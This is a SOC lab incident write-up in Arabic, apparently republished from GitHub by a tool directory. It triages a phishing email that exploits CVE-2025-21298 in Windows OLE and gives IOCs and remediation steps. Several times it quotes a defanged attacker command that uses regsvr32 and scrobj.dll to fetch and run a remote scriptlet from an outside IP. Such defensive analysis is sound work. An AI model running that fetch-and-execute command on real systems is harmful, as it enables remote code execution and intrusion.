Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - كشف استغلال RCE بدون نقرة في Windows OLE (CVE-2025-21298) - شرح تفصيلي | Kitploit
أدوات/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
تحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةالهندسة العكسيةالتحقيق الجنائي الرقميالتصيد الاحتياليتحليل البرمجيات الخبيثةالقيادة والسيطرةاستخبارات التهديدات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
التعلم والتعليم
الاستجابة للحوادث
أمان البريد الإلكتروني
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - كشف استغلال RCE بدون نقرة في Windows OLE (CVE-2025-21298) - شرح تفصيلي

عرض المستودعالموقع الإلكتروني
منذ 2 أشهرلم تتم المراجعة بعد

لينكد إن جيميل إنستغرام قديم ديسكورد ريديت


SOC336 - تم الكشف عن استغلال OLE ذو النقر الصفري من Windows (CVE-2025-21298) - دليل عملي

بريد إلكتروني تصيدي

🔎 جدول المحتويات
  1. الموقف
  2. نظرة عامة على التنبيه
  3. الأدوات المستخدمة
  4. التحليل
    • أمان البريد الإلكتروني
    • إدارة السجلات
      • سجل الوكيل
    • أمان نقطة النهاية
      • تاريخ الطرفية
      • إجراء الشبكة
      • العمليات
      • CVE-2025-21298
  5. دليل العمل
  6. ملاحظة المحلل
  7. المراجع

(العودة إلى الأعلى)

الموقف

تلقى أحد موظفينا، أوستن، بريدًا إلكترونيًا تصيديًا من مرسل مشبوه، وتم تشغيل تنبيه بعد أن فتح البريد الإلكتروني باستخدام Outlook في 4 فبراير 2025 الساعة 4:18 مساءً. كان سبب التشغيل هو "تم تحديد مرفق RTF ضار يحتوي على نمط استغلال معروف CVE-2025-21298" .

(العودة إلى الأعلى)

نظرة عامة على التنبيه

image

معرف الحدث (EventID) : 314

وقت الحدث : 4 فبراير 2025 الساعة 4:18 مساءً (أعتقد أنه كان خطأ)

القاعدة : SOC336 - تم الكشف عن استغلال OLE ذو النقر الصفري من Windows (CVE-2025-21298)

المستوى : محلل أمني

عنوان SMTP : 84.38.130.118

عنوان المصدر : [email protected]

عنوان الوجهة : [email protected]

موضوع البريد الإلكتروني : مهم: إجراء مطلوب لموعد التسليم النهائي للمشروع القادم

المرفق : mail.rtf

تجزئة المرفق : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

إجراء الجهاز : مسموح

سبب التشغيل : تم تحديد مرفق RTF ضار يحتوي على نمط استغلال معروف CVE-2025-21298.

(العودة إلى الأعلى)

الأدوات المستخدمة

  1. VirusTotal
  2. AbuseIPDB
  3. Gemini

(العودة إلى الأعلى)

التحليل

دعنا نتعمق في سجلات أمان البريد الإلكتروني وإدارة السجلات وأمان نقطة النهاية لفرز التنبيه.

أمان البريد الإلكتروني

لقطة شاشة 2026-05-27 151659

بحثت عن عنوان المرسل projectmanagement@pm[.]me وضغطت على البريد الإلكتروني "مهم: إجراء مطلوب لموعد التسليم النهائي للمشروع القادم" الذي أُرسل في الساعة 05:12 صباحًا من نفس اليوم، وهو ما بدا غريبًا بالنسبة لي لأن النغمة العاجلة والكلمات مثل "مهم" و"إجراء مطلوب" أعطتني فكرة أنه بريد إلكتروني تصيدي.



لقطة شاشة 2026-05-27 175944

بحثت عن النطاق pm[.]me على VirusTotal واعتبره بائع واحد فقط مشبوهًا.



لقطة شاشة 2026-05-27 151915

ومع ذلك، عندما بحثت عن عنوان SMTP 84[.]38[.]130[.]118، أبلغ 7 بائعين عنه كضار وبرمجيات خبيثة، وكان مرتبطًا بخادم SILVER C2.



لقطة شاشة 2026-05-27 180753 لقطة شاشة 2026-05-27 180810

تم العثور على 84[.]38[.]130[.]118 أيضًا في قاعدة بيانات AbuseIPDB. يقع في ريغا، ريغا، لاتفيا، وينتمي إلى اسم النطاق rixhost.lv ويُصنف ضمن هجمات حجب الخدمة (DDoS) والاختراق والمضيف المُستغل.



لقطة شاشة 2026-05-27 152243

أخيرًا، بحثت عن التجزئة df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 للمرفق mail.rtf على VirusTotal، وأبلغ 29 من أصل 61 بائعًا عن المرفق كضار. إنه ينتمي إلى عائلة البرامج الضارة rtfmalformb وكان مرتبطًا بثغرة CVE-2025-21298.

تم التأكيد على أنه تم إرسال بريد إلكتروني تصيدي مع مرفق ضار إلى أوستن.

(العودة إلى الأعلى)

إدارة السجلات

دعنا نتحقق مما إذا كانت هناك أنشطة مشبوهة بعد الساعة 05:12 صباحًا عندما فتح أوستن البريد الإلكتروني التصيدي.

سجل الوكيل

لقطة شاشة 2026-05-27 152515

أولاً، راجعت سجل الوكيل وبحثت عن عنوان IP الضار للمرسل 84[.]38[.]130[.]118، واكتشفت أنه في الساعة 08:06 صباحًا كان هناك طلب HTTP GET إلى عنوان IP الضار بعنوان URL hxxp://84[.]38[.]130[.]118/shell[.]sct ببدء من cmd.exe، حيث كان يقوم بتنزيل ملف Windows scriptlet. كان رمز الاستجابة 200 OK، مما يشير إلى أن حركة المرور الصادرة مسموح بها ولم يتم حظرها بواسطة جدار الحماية. كان من غير المعتاد الحصول على ملف سكريبت قد يحتوي على سكريبت شيل عكسي.

(العودة إلى الأعلى)

أمان نقطة النهاية

تاريخ الطرفية

image لقطة شاشة 2026-05-27 153447

نظرًا لأن حركة المرور الصادرة إلى عنوان IP الضار تم بدؤها بواسطة cmd.exe، فقد راجعت أولاً تاريخ الطرفية ووجدت أنه في الساعة 08:06:08 صباحًا تم تنفيذ أمر "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" لاستدعاء regsvr32.exe لجلب ملف السكريبت من عنوان IP الضار بواسطة scrobj.dll

  • regsvr32.exe: أداة سطر أوامر لتسجيل وإلغاء تسجيل عناصر تحكم OLE، مثل DLLs وعناصر تحكم ActiveX في سجل Windows
  • /s: تشغيل regsvr32.exe في الخلفية وبصمت
  • /u: إجبار Windows على عدم إضافة هذا المفتاح إلى سجل Windows
  • /i: واجهة
  • scrobj.dll: مكتبة وقت تشغيل كائنات السكريبت للتعامل مع ملفات scriptlet

يمكن أن يترك استخدام الأدوات المدمجة في Windows لجلب السكريبت آثارًا قليلة على النظام، مما يجعل عمليات الهندسة العكسية وتحليل البرامج الضارة أكثر صعوبة!

(العودة إلى الأعلى)

إجراء الشبكة

لقطة شاشة 2026-05-27 153102

تم التأكيد على وجود اتصال بعنوان IP الضار 84[.]38[.]130[.]118 في الساعة 08:06:42 صباحًا، بعد حدث تنفيذ الأمر.

(العودة إلى الأعلى)

العمليات

إذن لماذا تم تنفيذ cmd.exe بمجرد النقر على بريد إلكتروني؟ بينما لم يتم العثور على أي دليل على تنزيل أوستن للمرفق الضار mail.rtf، راجعت سجلات نقطة النهاية وبحثت عن أي حدث حوالي الساعة 08:06 صباحًا.

لقطة شاشة 2026-05-27 153636

معرف العملية: 7023

وقت الحدث: 4 فبراير 2025 08:06:25

سطر الأوامر: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

العملية الأم: cmd.exe



لقطة شاشة 2026-05-27 153616

حسنًا، دعنا نرى العملية الأم cmd.exe

معرف العملية: 6784

وقت الحدث: 4 فبراير 2025 08:06:08

سطر الأوامر: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

العملية الأم: outlook.exe



لقطة شاشة 2026-05-27 154136

وأخيرًا، راجعت العملية الأم لـ outlook.exe

معرف العملية: 4820

وقت الحدث: 4 فبراير 2025 08:05:15

سطر الأوامر: "C:\Windows\System32\cmd.exe"

العملية الأم: explorer.exe



إذن يمكننا استنتاج العمليات الضارة في شجرة:

explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! تنفيذ السكريبت !

ومع ذلك، كنت لا أزال أتساءل كيف تم بدء العمليات الضارة بدون تنزيل وفتح المرفق الضار، وكيف قام outlook.exe باستدعاء العملية الضارة حتى وجدت معلومات حول CVE-2025-21298.

(العودة إلى الأعلى)

CVE-2025-21298

لقطة شاشة 2026-05-27 201652

وفقًا للمقال من Offsec، كانت هناك ثغرة حرجة في OLE من Windows ذات نقر صفري تمكن من تنفيذ التعليمات البرمجية عن بعد عبر البريد الإلكتروني بدرجة CVSS 9.8 في يناير 2025. عندما يقوم المستلم المستهدف ببساطة بفتح أو معاينة البريد الإلكتروني الضار في Microsoft Outlook الذي يحتوي على مستند RTF ضار مع سكريبت مضمن ، يتم تشغيل الثغرة، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية على النظام المتأثر.

قمت ببعض البحث حول Windows OLE وعمليات اختطاف مستندات RTF على Google وGemini وربطها ببعض معرفتي بالهندسة العكسية:

  1. عند فتح أو معاينة مستند RTF، تقوم وظيفة UtOlePresStmToContentsStm داخل ole32.dll بتوجيه كائن OLE المشار إليه بواسطة pstmContents لقراءة بيانات الصورة المصغرة (OlePres) وإيداعها في ملف البيانات الفعلي (CONTENT).
  2. تؤدي الوظيفة فورًا إلى حدوث خطأ معالجة غير متوقع بسبب التنسيق التالف لملف RTF الخاص بالمهاجم، مما يتسبب في حذف كائن OLE ولكن ليس المؤشر pstmContents.
  3. يقوم ملف RTF الضار بإنشاء كائن OLE ضار يحتوي على التعليمات البرمجية الضارة بنفس الحجم تمامًا مثل كائن OLE المحذوف، مما يملأ نفس مساحة الذاكرة التي لا يزال المؤشر pstmContents يشير إليها.
  4. بعد انتهاء Outlook من المعاينة، يقوم بتشغيل عملية "التنظيف" المزيفة التي تحتوي على التعليمات البرمجية الضارة "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" داخل كائن OLE الضار المزيف.
  5. ينفذ نظام الضحية الحمولة عن بعد وينشئ شيلاً عكسيًا تلقائيًا دون أي نقرات.

(العودة إلى الأعلى)

دليل العمل

لقطة شاشة 2026-05-28 144059 لقطة شاشة 2026-05-28 144109 لقطة شاشة 2026-05-28 144141 لقطة شاشة 2026-05-28 144154 لقطة شاشة 2026-05-28 144226 لقطة شاشة 2026-05-28 144240

غير معزول

لقطة شاشة 2026-05-28 144252

ضار

لقطة شاشة 2026-05-28 144306

تم الوصول

لقطة شاشة 2026-05-28 144316 لقطة شاشة 2026-05-28 144343 لقطة شاشة 2026-05-28 144730 لقطة شاشة 2026-05-28 144804 لقطة شاشة 2026-05-28 144844 لقطة شاشة 2026-05-28 144940 لقطة شاشة 2026-05-28 145001

(العودة إلى الأعلى)

ملاحظة المحلل

التصنيف: حرج

النوع: برمجيات ضارة

وقت النشاط:

4 فبراير 2025 الساعة 05:12 صباحًا (استلام البريد الإلكتروني التصيدي)

4 فبراير 2025 من الساعة 08:05:15 صباحًا إلى الساعة 08:06:42 صباحًا (فتح البريد الإلكتروني التصيدي وتنفيذ التعليمات البرمجية الضارة)

الكيانات المتأثرة:

عنوان المصدر: projectmanagement@pm[.]me

عنوان SMTP: 84[.]38[.]130[.]118

عنوان البريد الإلكتروني للمستلم: Austin@letsdefend[.]io

عنوان IP للمستلم: 172[.]16[.]17[.]137

اسم المضيف: Austin

أسباب الإيجابية الحقيقية:

في 4 فبراير 2025 الساعة 05:12 صباحًا، تم إرسال بريد إلكتروني مشبوه بموضوع "مهم: إجراء مطلوب لموعد التسليم النهائي للمشروع القادم" من [email protected] (عنوان IP: 84.38.130.118) إلى [email protected] (عنوان IP: 172.16.17.137) مع مرفق mail.rtf (تجزئة SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). أعطت نغمات الإلحاح والكلمات المستخدمة في الموضوع فكرة عن بريد إلكتروني تصيدي. أبلغت أداة استخبارات التهديدات VirusTotal وAbuseIPDB عن عنوان IP للمرسل، الموجود في ريغا، ريغا، لاتفيا والتابع لاسم النطاق rixhost.lv، والمرفق كضار وبرمجيات خبيثة.

وفقًا لسجلات الوكيل، في الساعة 08:06 صباحًا كان هناك طلب HTTP GET إلى عنوان IP الضار بعنوان URL hxxp://84[.]38[.]130[.]118/shell[.]sct ببدء من cmd.exe، حيث كان يقوم بتنزيل ملف Windows scriptlet. كان رمز الاستجابة 200 OK، مما يشير إلى أن حركة المرور الصادرة إلى عنوان IP الضار مسموح بها ولم يتم حظرها بواسطة جدار الحماية.

وفقًا لسجلات أمان نقطة النهاية، تم بدء التعليمات البرمجية الضارة "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (معرف العملية: 7023) بواسطة cmd.exe (معرف العملية: 6784) المستدعاة من outlook.exe (معرف العملية: 4820)

كان الاستغلال ناتجًا عن ثغرة حرجة في Windows OLE ذات نقر صفري (CVE-2025-21298) تمكن من تنفيذ التعليمات البرمجية عن بعد عبر البريد الإلكتروني بدرجة CVSS 9.8 في يناير 2025. عندما يقوم المستلم المستهدف ببساطة بفتح أو معاينة البريد الإلكتروني الضار في Microsoft Outlook الذي يحتوي على مستند RTF ضار مع سكريبت مضمن، يتم تشغيل الثغرة، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية على النظام المتأثر، مما قد يؤدي إلى إنشاء شيل عكسي لخادم القيادة والتحكم (C2).

أسباب التصعيد:

بينما لم يتم ملاحظة حركة مرور شبكة C2 نشطة بعد الاستغلال بشكل قاطع حتى الآن، أكدت سجلات أمان نقطة النهاية تنفيذ regsvr32.exe باستخدام scrobj.dll لجلب ملف scriptlet shell.sct. نظرًا لدرجة CVSS 9.8 لـ CVE-2025-21298، هناك حاجة إلى مزيد من التحقيق للتحقق من وجود أي نشاط مشبوه على المضيف مثل الثبات أو تسريب البيانات.

الإصلاحات:

  • افصل فورًا المضيف Austin عن شبكة الشركة الداخلية
  • أنهِ عملية "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" والعمليات ذات الصلة cmd.exe, outlook.exe
  • احظر حركة المرور الصادرة إلى 84[.]38[.]130[.]118
  • ضع النطاق rixhost[.]lv في القائمة السوداء
  • ضع المرسل projectmanagement@pm[.]me في القائمة السوداء في خادم البريد الإلكتروني
  • قم بتصحيح الثغرة CVE-2025-21298
  • أعد تعيين بيانات اعتماد أوستن
  • قم بإجراء تحليل للذاكرة على المضيف Austin للتحقيق في الأنشطة الضارة مثل اتصال C2 والثبات وتسريب البيانات بعد تنفيذ shell.sct
  • قم بإجراء هندسة عكسية على shell.sct
  • قم بإجراء تحليل للبريد الإلكتروني للتحقق من عنوان IP الأصلي وعنوان العودة في رأس البريد الإلكتروني
  • احظر الوصول إلى الإنترنت الذي بدأته regsvr32.exe
  • قم بحملة توعية حول التصيد لتثقيف الموظفين بعدم فتح بريد إلكتروني من مرسلين غير معروفين أو بنبرة أو كلمات عاجلة

مؤشرات الاختراق:

  • عنوان المرسل: projectmanagement@pm[.]me
  • عنوان IP للمرسل: 84[.]38[.]130[.]118 نطاق المرسل: rixhost[.]lv
  • البريد الإلكتروني للتصيد: "هام: إجراء مطلوب لموعد المشروع القادم"
  • المستند الخبيث: mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
  • شجرة العمليات الخبيثة: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
  • الرابط إلى الحمولة الثانية: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

(العودة إلى الأعلى)

المرجع

تفاصيل CVE-2025-21298

CVE-2025-21298: ثغرة Windows OLE الحرجة بدون نقرة

(العودة إلى الأعلى)

تنزيل الأداة